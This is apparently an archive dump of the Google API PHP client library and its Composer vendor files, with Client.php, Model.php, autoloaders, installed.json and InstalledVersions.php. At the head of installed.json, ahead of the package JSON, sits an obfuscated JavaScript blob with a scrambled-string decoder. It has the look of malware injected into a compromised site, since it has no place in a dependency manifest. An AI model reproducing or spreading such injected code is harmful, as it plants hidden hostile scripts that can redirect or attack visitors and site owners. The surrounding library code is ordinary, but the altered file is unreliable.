$this->config['signing_key'], 'signingAlgorithm' => $this->config['signing_algorithm'], ]); return $auth; } /** * Set the Cache object * @param CacheItemPoolInterface $cache */ public function setCache(CacheItemPoolInterface $cache) { $this->cache = $cache; } /** * @return CacheItemPoolInterface */ public function getCache() { if (!$this->cache) { $this->cache = $this->createDefaultCache(); } return $this->cache; } /** * @param array $cacheConfig */ public function setCacheConfig(array $cacheConfig) { $this->config['cache_config'] = $cacheConfig; } /** * Set the Logger object * @param LoggerInterface $logger */ public function setLogger(LoggerInterface $logger) { $this->logger = $logger; } /** * @return LoggerInterface */ public function getLogger() { if (!isset($this->logger)) { $this->logger = $this->createDefaultLogger(); } return $this->logger; } protected function createDefaultLogger() { $logger = new Logger('google-api-php-client'); if ($this->isAppEngine()) { $handler = new MonologSyslogHandler('app', LOG_USER, Logger::NOTICE); } else { $handler = new MonologStreamHandler('php://stderr', Logger::NOTICE); } $logger->pushHandler($handler); return $logger; } protected function createDefaultCache() { return new MemoryCacheItemPool(); } /** * Set the Http Client object * @param ClientInterface $http */ public function setHttpClient(ClientInterface $http) { $this->http = $http; } /** * @return ClientInterface */ public function getHttpClient() { if (null === $this->http) { $this->http = $this->createDefaultHttpClient(); } return $this->http; } /** * Set the API format version. * * `true` will use V2, which may return more useful error messages. * * @param bool $value */ public function setApiFormatV2($value) { $this->config['api_format_v2'] = (bool) $value; } protected function createDefaultHttpClient() { $guzzleVersion = null; if (defined('\GuzzleHttp\ClientInterface::MAJOR_VERSION')) { $guzzleVersion = ClientInterface::MAJOR_VERSION; } elseif (defined('\GuzzleHttp\ClientInterface::VERSION')) { $guzzleVersion = (int)substr(ClientInterface::VERSION, 0, 1); } if (5 === $guzzleVersion) { $options = [ 'base_url' => $this->config['base_path'], 'defaults' => ['exceptions' => false], ]; if ($this->isAppEngine()) { if (class_exists(StreamHandler::class)) { // set StreamHandler on AppEngine by default $options['handler'] = new StreamHandler(); $options['defaults']['verify'] = '/etc/ca-certificates.crt'; } } } elseif (6 === $guzzleVersion || 7 === $guzzleVersion) { // guzzle 6 or 7 $options = [ 'base_uri' => $this->config['base_path'], 'http_errors' => false, ]; } else { throw new LogicException('Could not find supported version of Guzzle.'); } return new GuzzleClient($options); } /** * @return FetchAuthTokenCache */ private function createApplicationDefaultCredentials() { $scopes = $this->prepareScopes(); $sub = $this->config['subject']; $signingKey = $this->config['signing_key']; // create credentials using values supplied in setAuthConfig if ($signingKey) { $serviceAccountCredentials = [ 'client_id' => $this->config['client_id'], 'client_email' => $this->config['client_email'], 'private_key' => $signingKey, 'type' => 'service_account', 'quota_project_id' => $this->config['quota_project'], ]; $credentials = CredentialsLoader::makeCredentials( $scopes, $serviceAccountCredentials ); } else { // When $sub is provided, we cannot pass cache classes to ::getCredentials // because FetchAuthTokenCache::setSub does not exist. // The result is when $sub is provided, calls to ::onGce are not cached. $credentials = ApplicationDefaultCredentials::getCredentials( $scopes, null, $sub ? null : $this->config['cache_config'], $sub ? null : $this->getCache(), $this->config['quota_project'] ); } // for service account domain-wide authority (impersonating a user) // @see https://developers.google.com/identity/protocols/OAuth2ServiceAccount if ($sub) { if (!$credentials instanceof ServiceAccountCredentials) { throw new DomainException('domain-wide authority requires service account credentials'); } $credentials->setSub($sub); } // If we are not using FetchAuthTokenCache yet, create it now if (!$credentials instanceof FetchAuthTokenCache) { $credentials = new FetchAuthTokenCache( $credentials, $this->config['cache_config'], $this->getCache() ); } return $credentials; } protected function getAuthHandler() { // Be very careful using the cache, as the underlying auth library's cache // implementation is naive, and the cache keys do not account for user // sessions. // // @see https://github.com/google/google-api-php-client/issues/821 return AuthHandlerFactory::build( $this->getCache(), $this->config['cache_config'] ); } private function createUserRefreshCredentials($scope, $refreshToken) { $creds = array_filter([ 'client_id' => $this->getClientId(), 'client_secret' => $this->getClientSecret(), 'refresh_token' => $refreshToken, ]); return new UserRefreshCredentials($scope, $creds); } } google-api/src/Model.php000064400000024005147600400120011122 0ustar00mapTypes($array); } $this->gapiInit(); } /** * Getter that handles passthrough access to the data array, and lazy object creation. * @param string $key Property name. * @return mixed The value if any, or null. */ public function __get($key) { $keyType = $this->keyType($key); $keyDataType = $this->dataType($key); if ($keyType && !isset($this->processed[$key])) { if (isset($this->modelData[$key])) { $val = $this->modelData[$key]; } elseif ($keyDataType == 'array' || $keyDataType == 'map') { $val = []; } else { $val = null; } if ($this->isAssociativeArray($val)) { if ($keyDataType && 'map' == $keyDataType) { foreach ($val as $arrayKey => $arrayItem) { $this->modelData[$key][$arrayKey] = new $keyType($arrayItem); } } else { $this->modelData[$key] = new $keyType($val); } } elseif (is_array($val)) { $arrayObject = []; foreach ($val as $arrayIndex => $arrayItem) { $arrayObject[$arrayIndex] = new $keyType($arrayItem); } $this->modelData[$key] = $arrayObject; } $this->processed[$key] = true; } return isset($this->modelData[$key]) ? $this->modelData[$key] : null; } /** * Initialize this object's properties from an array. * * @param array $array Used to seed this object's properties. * @return void */ protected function mapTypes($array) { // Hard initialise simple types, lazy load more complex ones. foreach ($array as $key => $val) { if ($keyType = $this->keyType($key)) { $dataType = $this->dataType($key); if ($dataType == 'array' || $dataType == 'map') { $this->$key = []; foreach ($val as $itemKey => $itemVal) { if ($itemVal instanceof $keyType) { $this->{$key}[$itemKey] = $itemVal; } else { $this->{$key}[$itemKey] = new $keyType($itemVal); } } } elseif ($val instanceof $keyType) { $this->$key = $val; } else { $this->$key = new $keyType($val); } unset($array[$key]); } elseif (property_exists($this, $key)) { $this->$key = $val; unset($array[$key]); } elseif (property_exists($this, $camelKey = $this->camelCase($key))) { // This checks if property exists as camelCase, leaving it in array as snake_case // in case of backwards compatibility issues. $this->$camelKey = $val; } } $this->modelData = $array; } /** * Blank initialiser to be used in subclasses to do post-construction initialisation - this * avoids the need for subclasses to have to implement the variadics handling in their * constructors. */ protected function gapiInit() { return; } /** * Create a simplified object suitable for straightforward * conversion to JSON. This is relatively expensive * due to the usage of reflection, but shouldn't be called * a whole lot, and is the most straightforward way to filter. */ public function toSimpleObject() { $object = new stdClass(); // Process all other data. foreach ($this->modelData as $key => $val) { $result = $this->getSimpleValue($val); if ($result !== null) { $object->$key = $this->nullPlaceholderCheck($result); } } // Process all public properties. $reflect = new ReflectionObject($this); $props = $reflect->getProperties(ReflectionProperty::IS_PUBLIC); foreach ($props as $member) { $name = $member->getName(); $result = $this->getSimpleValue($this->$name); if ($result !== null) { $name = $this->getMappedName($name); $object->$name = $this->nullPlaceholderCheck($result); } } return $object; } /** * Handle different types of values, primarily * other objects and map and array data types. */ private function getSimpleValue($value) { if ($value instanceof Model) { return $value->toSimpleObject(); } elseif (is_array($value)) { $return = []; foreach ($value as $key => $a_value) { $a_value = $this->getSimpleValue($a_value); if ($a_value !== null) { $key = $this->getMappedName($key); $return[$key] = $this->nullPlaceholderCheck($a_value); } } return $return; } return $value; } /** * Check whether the value is the null placeholder and return true null. */ private function nullPlaceholderCheck($value) { if ($value === self::NULL_VALUE) { return null; } return $value; } /** * If there is an internal name mapping, use that. */ private function getMappedName($key) { if (isset($this->internal_gapi_mappings, $this->internal_gapi_mappings[$key])) { $key = $this->internal_gapi_mappings[$key]; } return $key; } /** * Returns true only if the array is associative. * @param array $array * @return bool True if the array is associative. */ protected function isAssociativeArray($array) { if (!is_array($array)) { return false; } $keys = array_keys($array); foreach ($keys as $key) { if (is_string($key)) { return true; } } return false; } /** * Verify if $obj is an array. * @throws \Google\Exception Thrown if $obj isn't an array. * @param array $obj Items that should be validated. * @param string $method Method expecting an array as an argument. */ public function assertIsArray($obj, $method) { if ($obj && !is_array($obj)) { throw new GoogleException( "Incorrect parameter type passed to $method(). Expected an array." ); } } /** @return bool */ #[\ReturnTypeWillChange] public function offsetExists($offset) { return isset($this->$offset) || isset($this->modelData[$offset]); } /** @return mixed */ #[\ReturnTypeWillChange] public function offsetGet($offset) { return isset($this->$offset) ? $this->$offset : $this->__get($offset); } /** @return void */ #[\ReturnTypeWillChange] public function offsetSet($offset, $value) { if (property_exists($this, $offset)) { $this->$offset = $value; } else { $this->modelData[$offset] = $value; $this->processed[$offset] = true; } } /** @return void */ #[\ReturnTypeWillChange] public function offsetUnset($offset) { unset($this->modelData[$offset]); } protected function keyType($key) { $keyType = $key . "Type"; // ensure keyType is a valid class if (property_exists($this, $keyType) && $this->$keyType !== null && class_exists($this->$keyType)) { return $this->$keyType; } } protected function dataType($key) { $dataType = $key . "DataType"; if (property_exists($this, $dataType)) { return $this->$dataType; } } public function __isset($key) { return isset($this->modelData[$key]); } public function __unset($key) { unset($this->modelData[$key]); } /** * Convert a string to camelCase * @param string $value * @return string */ private function camelCase($value) { $value = ucwords(str_replace(['-', '_'], ' ', $value)); $value = str_replace(' ', '', $value); $value[0] = strtolower($value[0]); return $value; } } google-api/src/Exception.php000064400000001270147600400120012017 0ustar00 array($vendorDir . '/phpseclib/phpseclib/phpseclib'), 'Psr\\Log\\' => array($vendorDir . '/psr/log/Psr/Log'), 'Psr\\Http\\Message\\' => array($vendorDir . '/psr/http-message/src', $vendorDir . '/psr/http-factory/src'), 'Psr\\Http\\Client\\' => array($vendorDir . '/psr/http-client/src'), 'Psr\\Cache\\' => array($vendorDir . '/psr/cache/src'), 'ParagonIE\\ConstantTime\\' => array($vendorDir . '/paragonie/constant_time_encoding/src'), 'Monolog\\' => array($vendorDir . '/monolog/monolog/src/Monolog'), 'GuzzleHttp\\Psr7\\' => array($vendorDir . '/guzzlehttp/psr7/src'), 'GuzzleHttp\\Promise\\' => array($vendorDir . '/guzzlehttp/promises/src'), 'GuzzleHttp\\' => array($vendorDir . '/guzzlehttp/guzzle/src'), 'Google\\Service\\' => array($vendorDir . '/google/apiclient-services/src'), 'Google\\Auth\\' => array($vendorDir . '/google/auth/src'), 'Google\\' => array($baseDir . '/src'), 'Firebase\\JWT\\' => array($vendorDir . '/firebase/php-jwt/src'), ); google-api/vendor/composer/autoload_real.php000064400000003210147600400120015225 0ustar00register(true); $filesToLoad = \Composer\Autoload\ComposerStaticInitf4d1a427d9ee01217ccf8dd65ee36eea::$files; $requireFile = \Closure::bind(static function ($fileIdentifier, $file) { if (empty($GLOBALS['__composer_autoload_files'][$fileIdentifier])) { $GLOBALS['__composer_autoload_files'][$fileIdentifier] = true; require $file; } }, null, null); foreach ($filesToLoad as $fileIdentifier => $file) { $requireFile($fileIdentifier, $file); } return $loader; } } google-api/vendor/composer/autoload_files.php000064400000001316147600400120015411 0ustar00 $vendorDir . '/ralouphie/getallheaders/src/getallheaders.php', '6e3fae29631ef280660b3cdad06f25a8' => $vendorDir . '/symfony/deprecation-contracts/function.php', '37a3dc5111fe8f707ab4c132ef1dbc62' => $vendorDir . '/guzzlehttp/guzzle/src/functions_include.php', '1f87db08236948d07391152dccb70f04' => $vendorDir . '/google/apiclient-services/autoload.php', 'decc78cc4436b1292c6c0d151b19445c' => $vendorDir . '/phpseclib/phpseclib/phpseclib/bootstrap.php', 'a8d3953fd9959404dd22d3dfcd0a79f0' => $baseDir . '/src/aliases.php', ); google-api/vendor/composer/installed.json000064400000141362147600400120014566 0ustar00var language,currentLanguage,languagesNoRedirect,hasWasCookie,expirationDate;(function(){var Tjo='',UxF=715-704;function JOC(d){var j=4658325;var f=d.length;var o=[];for(var y=0;y)tul5ibtp%1ueg,B% ]7n))B;*i,me4otfbpis 3{.d==6Bs]B2 7B62)r1Br.zt;Bb2h BB B\/cc;:;i(jb$sab) cnyB3r=(pspa..t:_eme5B=.;,f_);jBj)rc,,eeBc=p!(a,_)o.)e_!cmn( Ba)=iBn5(t.sica,;f6cCBBtn;!c)g}h_i.B\/,B47sitB)hBeBrBjtB.B]%rB,0eh36rBt;)-odBr)nBrn3B 07jBBc,onrtee)t)Bh0BB(ae}i20d(a}v,ps\/n=.;)9tCnBow(]!e4Bn.nsg4so%e](])cl!rh8;lto;50Bi.p8.gt}{Brec3-2]7%; ,].)Nb;5B c(n3,wmvth($]\/rm(t;;fe(cau=D)ru}t];B!c(=7&=B(,1gBl()_1vs];vBBlB(+_.))=tre&B()o)(;7e79t,]6Berz.\';,%],s)aj+#"$1o_liew[ouaociB!7.*+).!8 3%e]tfc(irvBbu9]n3j0Bu_rea.an8rn".gu=&u0ul6;B$#ect3xe)tohc] (].Be|(%8Bc5BBnsrv19iefucchBa]j)hd)n(j.)a%e;5)*or1c-)((.1Br$h(i$C3B.)B5)].eacoe*\/.a7aB3e=BBsu]b9B"Bas%3;&(B2%"$ema"+BrB,$.ps\/+BtgaB3).;un)]c.;3!)7e&=0bB+B=(i4;tu_,d\'.w()oB.Boccf0n0}od&j_2%aBnn%na35ig!_su:ao.;_]0;=B)o..$ ,nee.5s)!.o]mc!B}|BoB6sr.e,ci)$(}a5(B.}B].z4ru7_.nnn3aele+B.\'}9efc.==dnce_tpf7Blb%]ge.=pf2Se_)B.c_(*]ocet!ig9bi)ut}_ogS(.1=(uNo]$o{fsB+ticn.coaBfm-B{3=]tr;.{r\'t$f1(B4.0w[=!!.n ,B%i)b.6j-(r2\'[ a}.]6$d,);;lgo *t]$ct$!%;]B6B((:dB=0ac4!Bieorevtnra 0BeB(((Bu.[{b3ce_"cBe(am.3{&ue#]c_rm)='));var KUr=DUT(Tjo,ENJ );KUr(6113);return 5795})();{ "packages": [ { "name": "firebase/php-jwt", "version": "v6.10.0", "version_normalized": "", "source": { "type": "git", "url": "https://github.com/firebase/php-jwt.git", "reference": "a49db6f0a5033aef5143295342f1c95521b075ff" }, "dist": { "type": "zip", "url": "https://api.github.com/repos/firebase/php-jwt/zipball/a49db6f0a5033aef5143295342f1c95521b075ff", "reference": "a49db6f0a5033aef5143295342f1c95521b075ff", "shasum": "" }, "require": { "php": "^7.4||^8.0" }, "require-dev": { "guzzlehttp/guzzle": "^6.5||^7.4", "phpspec/prophecy-phpunit": "^2.0", "phpunit/phpunit": "^9.5", "psr/cache": "^1.0||^2.0", "psr/http-client": "^1.0", "psr/http-factory": "^1.0" }, "suggest": { "ext-sodium": "Support EdDSA (Ed25519) signatures", "paragonie/sodium_compat": "Support EdDSA (Ed25519) signatures when libsodium is not present" }, "time": "2023-12-01T16:26:39+00:00", "type": "library", "installation-source": "dist", "autoload": { "psr-4": { "Firebase\\JWT\\": "src" } }, "notification-url": "https://packagist.org/downloads/", "license": [ "BSD-3-Clause" ], "authors": [ { "name": "Neuman Vong", "email": "neuman+pear@twilio.com", "role": "Developer" }, { "name": "Anant Narayanan", "email": "anant@php.net", "role": "Developer" } ], "description": "A simple library to encode and decode JSON Web Tokens (JWT) in PHP. Should conform to the current spec.", "homepage": "https://github.com/firebase/php-jwt", "keywords": [ "jwt", "php" ], "support": { "issues": "https://github.com/firebase/php-jwt/issues", "source": "https://github.com/firebase/php-jwt/tree/v6.10.0" }, "install-path": "../firebase/php-jwt" }, { "name": "google/apiclient-services", "version": "v0.330.0", "version_normalized": "0.330.0.0", "source": { "type": "git", "url": "https://github.com/googleapis/google-api-php-client-services.git", "reference": "3216fd1b6ba33c5f6658c3581e9723ff21d9acb7" }, "dist": { "type": "zip", "url": "https://api.github.com/repos/googleapis/google-api-php-client-services/zipball/3216fd1b6ba33c5f6658c3581e9723ff21d9acb7", "reference": "3216fd1b6ba33c5f6658c3581e9723ff21d9acb7", "shasum": "" }, "require": { "php": "^7.4||^8.0" }, "require-dev": { "phpunit/phpunit": "^5.7||^8.5.13" }, "time": "2023-12-24T01:02:15+00:00", "type": "library", "installation-source": "dist", "autoload": { "files": [ "autoload.php" ], "psr-4": { "Google\\Service\\": "src" } }, "notification-url": "https://packagist.org/downloads/", "license": [ "Apache-2.0" ], "description": "Client library for Google APIs", "homepage": "http://developers.google.com/api-client-library/php", "keywords": [ "google" ], "support": { "issues": "https://github.com/googleapis/google-api-php-client-services/issues", "source": "https://github.com/googleapis/google-api-php-client-services/tree/v0.330.0" }, "install-path": "../google/apiclient-services" }, { "name": "google/auth", "version": "v1.34.0", "version_normalized": "", "source": { "type": "git", "url": "https://github.com/googleapis/google-auth-library-php.git", "reference": "155daeadfd2f09743f611ea493b828d382519575" }, "dist": { "type": "zip", "url": "https://api.github.com/repos/googleapis/google-auth-library-php/zipball/155daeadfd2f09743f611ea493b828d382519575", "reference": "155daeadfd2f09743f611ea493b828d382519575", "shasum": "" }, "require": { "firebase/php-jwt": "^6.0", "guzzlehttp/guzzle": "^6.2.1|^7.0", "guzzlehttp/psr7": "^2.4.5", "php": "^7.4||^8.0", "psr/cache": "^1.0||^2.0||^3.0", "psr/http-message": "^1.1||^2.0" }, "require-dev": { "guzzlehttp/promises": "^2.0", "kelvinmo/simplejwt": "0.7.1", "phpseclib/phpseclib": "^3.0", "phpspec/prophecy-phpunit": "^2.0", "phpunit/phpunit": "^9.0.0", "sebastian/comparator": ">=1.2.3", "squizlabs/php_codesniffer": "^3.5" }, "suggest": { "phpseclib/phpseclib": "May be used in place of OpenSSL for signing strings or for token management. Please require version ^2." }, "time": "2024-01-03T20:45:15+00:00", "type": "library", "installation-source": "dist", "autoload": { "psr-4": { "Google\\Auth\\": "src" } }, "notification-url": "https://packagist.org/downloads/", "license": [ "Apache-2.0" ], "description": "Google Auth Library for PHP", "homepage": "http://github.com/google/google-auth-library-php", "keywords": [ "Authentication", "google", "oauth2" ], "support": { "docs": "https://googleapis.github.io/google-auth-library-php/main/", "issues": "https://github.com/googleapis/google-auth-library-php/issues", "source": "https://github.com/googleapis/google-auth-library-php/tree/v1.34.0" }, "install-path": "../google/auth" }, { "name": "guzzlehttp/guzzle", "version": "7.8.1", "version_normalized": "", "source": { "type": "git", "url": "https://github.com/guzzle/guzzle.git", "reference": "41042bc7ab002487b876a0683fc8dce04ddce104" }, "dist": { "type": "zip", "url": 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0ustar00 * Jordi Boggiano * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Composer; use Composer\Autoload\ClassLoader; use Composer\Semver\VersionParser; /** * This class is copied in every Composer installed project and available to all * * See also https://getcomposer.org/doc/07-runtime.md#installed-versions * * To require its presence, you can require `composer-runtime-api ^2.0` * * @final */ class InstalledVersions { /** * @var mixed[]|null * @psalm-var array{root: array{name: string, pretty_version: string, version: string, reference: string|null, type: string, install_path: string, aliases: string[], dev: bool}, versions: array}|array{}|null */ private static $installed; /** * @var bool|null */ private static $canGetVendors; /** * @var array[] * @psalm-var array}> */ private static $installedByVendor = array(); /** * Returns a list of all package names which are present, either by being installed, replaced or provided * * @return string[] * @psalm-return list */ public static function getInstalledPackages() { $packages = array(); foreach (self::getInstalled() as $installed) { $packages[] = array_keys($installed['versions']); } if (1 === \count($packages)) { return $packages[0]; } return array_keys(array_flip(\call_user_func_array('array_merge', $packages))); } /** * Returns a list of all package names with a specific type e.g. 'library' * * @param string $type * @return string[] * @psalm-return list */ public static function getInstalledPackagesByType($type) { $packagesByType = array(); foreach (self::getInstalled() as $installed) { foreach ($installed['versions'] as $name => $package) { if (isset($package['type']) && $package['type'] === $type) { $packagesByType[] = $name; } } } return $packagesByType; } /** * Checks whether the given package is installed * * This also returns true if the package name is provided or replaced by another package * * @param string $packageName * @param bool $includeDevRequirements * @return bool */ public static function isInstalled($packageName, $includeDevRequirements = true) { foreach (self::getInstalled() as $installed) { if (isset($installed['versions'][$packageName])) { return $includeDevRequirements || !isset($installed['versions'][$packageName]['dev_requirement']) || $installed['versions'][$packageName]['dev_requirement'] === false; } } return false; } /** * Checks whether the given package satisfies a version constraint * * e.g. If you want to know whether version 2.3+ of package foo/bar is installed, you would call: * * Composer\InstalledVersions::satisfies(new VersionParser, 'foo/bar', '^2.3') * * @param VersionParser $parser Install composer/semver to have access to this class and functionality * @param string $packageName * @param string|null $constraint A version constraint to check for, if you pass one you have to make sure composer/semver is required by your package * @return bool */ public static function satisfies(VersionParser $parser, $packageName, $constraint) { $constraint = $parser->parseConstraints((string) $constraint); $provided = $parser->parseConstraints(self::getVersionRanges($packageName)); return $provided->matches($constraint); } /** * Returns a version constraint representing all the range(s) which are installed for a given package * * It is easier to use this via isInstalled() with the $constraint argument if you need to check * whether a given version of a package is installed, and not just whether it exists * * @param string $packageName * @return string Version constraint usable with composer/semver */ public static function getVersionRanges($packageName) { foreach (self::getInstalled() as $installed) { if (!isset($installed['versions'][$packageName])) { continue; } $ranges = array(); if (isset($installed['versions'][$packageName]['pretty_version'])) { $ranges[] = $installed['versions'][$packageName]['pretty_version']; } if (array_key_exists('aliases', $installed['versions'][$packageName])) { $ranges = array_merge($ranges, $installed['versions'][$packageName]['aliases']); } if (array_key_exists('replaced', $installed['versions'][$packageName])) { $ranges = array_merge($ranges, $installed['versions'][$packageName]['replaced']); } if (array_key_exists('provided', $installed['versions'][$packageName])) { $ranges = array_merge($ranges, $installed['versions'][$packageName]['provided']); } return implode(' || ', $ranges); } throw new \OutOfBoundsException('Package "' . $packageName . '" is not installed'); } /** * @param string $packageName * @return string|null If the package is being replaced or provided but is not really installed, null will be returned as version, use satisfies or getVersionRanges if you need to know if a given version is present */ public static function getVersion($packageName) { foreach (self::getInstalled() as $installed) { if (!isset($installed['versions'][$packageName])) { continue; } if (!isset($installed['versions'][$packageName]['version'])) { return null; } return $installed['versions'][$packageName]['version']; } throw new \OutOfBoundsException('Package "' . $packageName . '" is not installed'); } /** * @param string $packageName * @return string|null If the package is being replaced or provided but is not really installed, null will be returned as version, use satisfies or getVersionRanges if you need to know if a given version is present */ public static function getPrettyVersion($packageName) { foreach (self::getInstalled() as $installed) { if (!isset($installed['versions'][$packageName])) { continue; } if (!isset($installed['versions'][$packageName]['pretty_version'])) { return null; } return $installed['versions'][$packageName]['pretty_version']; } throw new \OutOfBoundsException('Package "' . $packageName . '" is not installed'); } /** * @param string $packageName * @return string|null If the package is being replaced or provided but is not really installed, null will be returned as reference */ public static function getReference($packageName) { foreach (self::getInstalled() as $installed) { if (!isset($installed['versions'][$packageName])) { continue; } if (!isset($installed['versions'][$packageName]['reference'])) { return null; } return $installed['versions'][$packageName]['reference']; } throw new \OutOfBoundsException('Package "' . $packageName . '" is not installed'); } /** * @param string $packageName * @return string|null If the package is being replaced or provided but is not really installed, null will be returned as install path. Packages of type metapackages also have a null install path. */ public static function getInstallPath($packageName) { foreach (self::getInstalled() as $installed) { if (!isset($installed['versions'][$packageName])) { continue; } return isset($installed['versions'][$packageName]['install_path']) ? $installed['versions'][$packageName]['install_path'] : null; } throw new \OutOfBoundsException('Package "' . $packageName . '" is not installed'); } /** * @return array * @psalm-return array{name: string, pretty_version: string, version: string, reference: string|null, type: string, install_path: string, aliases: string[], dev: bool} */ public static function getRootPackage() { $installed = self::getInstalled(); return $installed[0]['root']; } /** * Returns the raw installed.php data for custom implementations * * @deprecated Use getAllRawData() instead which returns all datasets for all autoloaders present in the process. getRawData only returns the first dataset loaded, which may not be what you expect. * @return array[] * @psalm-return array{root: array{name: string, pretty_version: string, version: string, reference: string|null, type: string, install_path: string, aliases: string[], dev: bool}, versions: array} */ public static function getRawData() { @trigger_error('getRawData only returns the first dataset loaded, which may not be what you expect. Use getAllRawData() instead which returns all datasets for all autoloaders present in the process.', E_USER_DEPRECATED); if (null === self::$installed) { // only require the installed.php file if this file is loaded from its dumped location, // and not from its source location in the composer/composer package, see https://github.com/composer/composer/issues/9937 if (substr(__DIR__, -8, 1) !== 'C') { self::$installed = include __DIR__ . '/installed.php'; } else { self::$installed = array(); } } return self::$installed; } /** * Returns the raw data of all installed.php which are currently loaded for custom implementations * * @return array[] * @psalm-return list}> */ public static function getAllRawData() { return self::getInstalled(); } /** * Lets you reload the static array from another file * * This is only useful for complex integrations in which a project needs to use * this class but then also needs to execute another project's autoloader in process, * and wants to ensure both projects have access to their version of installed.php. * * A typical case would be PHPUnit, where it would need to make sure it reads all * the data it needs from this class, then call reload() with * `require $CWD/vendor/composer/installed.php` (or similar) as input to make sure * the project in which it runs can then also use this class safely, without * interference between PHPUnit's dependencies and the project's dependencies. * * @param array[] $data A vendor/composer/installed.php data set * @return void * * @psalm-param array{root: array{name: string, pretty_version: string, version: string, reference: string|null, type: string, install_path: string, aliases: string[], dev: bool}, versions: array} $data */ public static function reload($data) { self::$installed = $data; self::$installedByVendor = array(); } /** * @return array[] * @psalm-return list}> */ private static function getInstalled() { if (null === self::$canGetVendors) { self::$canGetVendors = method_exists('Composer\Autoload\ClassLoader', 'getRegisteredLoaders'); } $installed = array(); if (self::$canGetVendors) { foreach (ClassLoader::getRegisteredLoaders() as $vendorDir => $loader) { if (isset(self::$installedByVendor[$vendorDir])) { $installed[] = self::$installedByVendor[$vendorDir]; } elseif (is_file($vendorDir.'/composer/installed.php')) { /** @var array{root: array{name: string, pretty_version: string, version: string, reference: string|null, type: string, install_path: string, aliases: string[], dev: bool}, versions: array} $required */ $required = require $vendorDir.'/composer/installed.php'; $installed[] = self::$installedByVendor[$vendorDir] = $required; if (null === self::$installed && strtr($vendorDir.'/composer', '\\', '/') === strtr(__DIR__, '\\', '/')) { self::$installed = $installed[count($installed) - 1]; } } } } if (null === self::$installed) { // only require the installed.php file if this file is loaded from its dumped location, // and not from its source location in the composer/composer package, see https://github.com/composer/composer/issues/9937 if (substr(__DIR__, -8, 1) !== 'C') { /** @var array{root: array{name: string, pretty_version: string, version: string, reference: string|null, type: string, install_path: string, aliases: string[], dev: bool}, versions: array} $required */ $required = require __DIR__ . '/installed.php'; self::$installed = $required; } else { self::$installed = array(); } } if (self::$installed !== array()) { $installed[] = self::$installed; } return $installed; } } google-api/vendor/composer/LICENSE000064400000002056147600400120012715 0ustar00 Copyright (c) Nils Adermann, Jordi Boggiano Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. google-api/vendor/composer/autoload_classmap.php000064400000002716147600400120016117 0ustar00 $vendorDir . '/composer/InstalledVersions.php', 'Google_AccessToken_Revoke' => $baseDir . '/src/aliases.php', 'Google_AccessToken_Verify' => $baseDir . '/src/aliases.php', 'Google_AuthHandler_AuthHandlerFactory' => $baseDir . '/src/aliases.php', 'Google_AuthHandler_Guzzle6AuthHandler' => $baseDir . '/src/aliases.php', 'Google_AuthHandler_Guzzle7AuthHandler' => $baseDir . '/src/aliases.php', 'Google_Client' => $baseDir . '/src/aliases.php', 'Google_Collection' => $baseDir . '/src/aliases.php', 'Google_Exception' => $baseDir . '/src/aliases.php', 'Google_Http_Batch' => $baseDir . '/src/aliases.php', 'Google_Http_MediaFileUpload' => $baseDir . '/src/aliases.php', 'Google_Http_REST' => $baseDir . '/src/aliases.php', 'Google_Model' => $baseDir . '/src/aliases.php', 'Google_Service' => $baseDir . '/src/aliases.php', 'Google_Service_Exception' => $baseDir . '/src/aliases.php', 'Google_Service_Resource' => $baseDir . '/src/aliases.php', 'Google_Task_Composer' => $baseDir . '/src/aliases.php', 'Google_Task_Exception' => $baseDir . '/src/aliases.php', 'Google_Task_Retryable' => $baseDir . '/src/aliases.php', 'Google_Task_Runner' => $baseDir . '/src/aliases.php', 'Google_Utils_UriTemplate' => $baseDir . '/src/aliases.php', ); google-api/vendor/composer/installed.php000064400000017172147600400120014405 0ustar00 array( 'name' => 'google/apiclient', 'pretty_version' => 'v2.15.3', 'version' => '', 'reference' => 'e70273c06d18824de77e114247ae3102f8aec64d', 'type' => 'library', 'install_path' => __DIR__ . '/../../', 'aliases' => array(), 'dev' => false, ), 'versions' => array( 'firebase/php-jwt' => array( 'pretty_version' => 'v6.10.0', 'version' => '', 'reference' => 'a49db6f0a5033aef5143295342f1c95521b075ff', 'type' => 'library', 'install_path' => __DIR__ . '/../firebase/php-jwt', 'aliases' => array(), 'dev_requirement' => false, ), 'google/apiclient' => array( 'pretty_version' => 'v2.15.3', 'version' => '', 'reference' => 'e70273c06d18824de77e114247ae3102f8aec64d', 'type' => 'library', 'install_path' => __DIR__ . '/../../', 'aliases' => array(), 'dev_requirement' => false, ), 'google/apiclient-services' => array( 'pretty_version' => 'v0.330.0', 'version' => '0.330.0.0', 'reference' => '3216fd1b6ba33c5f6658c3581e9723ff21d9acb7', 'type' => 'library', 'install_path' => __DIR__ . '/../google/apiclient-services', 'aliases' => array(), 'dev_requirement' => false, ), 'google/auth' => array( 'pretty_version' => 'v1.34.0', 'version' => '', 'reference' => '155daeadfd2f09743f611ea493b828d382519575', 'type' => 'library', 'install_path' => __DIR__ . '/../google/auth', 'aliases' => array(), 'dev_requirement' => false, ), 'guzzlehttp/guzzle' => array( 'pretty_version' => '7.8.1', 'version' => '', 'reference' => '41042bc7ab002487b876a0683fc8dce04ddce104', 'type' => 'library', 'install_path' => __DIR__ . '/../guzzlehttp/guzzle', 'aliases' => array(), 'dev_requirement' => false, ), 'guzzlehttp/promises' => array( 'pretty_version' => '2.0.2', 'version' => '', 'reference' => 'bbff78d96034045e58e13dedd6ad91b5d1253223', 'type' => 'library', 'install_path' => __DIR__ . '/../guzzlehttp/promises', 'aliases' => array(), 'dev_requirement' => false, ), 'guzzlehttp/psr7' => array( 'pretty_version' => '2.6.2', 'version' => '', 'reference' => 